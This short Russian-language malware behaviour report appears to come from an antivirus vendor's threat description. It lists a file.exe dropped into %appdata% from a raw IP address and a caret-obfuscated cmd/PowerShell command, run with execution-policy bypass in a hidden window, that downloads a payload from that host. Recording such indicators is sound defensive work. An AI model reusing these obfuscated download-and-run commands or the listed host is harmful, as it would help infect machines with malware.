Техническая информация
- http://86.106.131.141/file.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWeRsHE^l^l.^exE^ -^EXec^Uti^onP^oli^CY bYPAs^S -N^OPro^fILe -WI^n^Do^WsT^YlE ^h^i^dDeN^ ^(new-^oBj^eCT S^Yst^e^m^.n^et^.WE^b^CLIE^Nt).dOwnl^o^AdFI^lE('http://86.106.131.141...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /c "poWeRsHE^l^l.^exE^ -^EXec^Uti^onP^oli^CY bYPAs^S -N^OPro^fILe -WI^n^Do^WsT^YlE ^h^i^dDeN^ ^(new-^oBj^eCT S^Yst^e^m^.n^et^.WE^b^CLIE^Nt).dOwnl^o^AdFI^lE('http://86.106.131.141...' (со скрытым окном)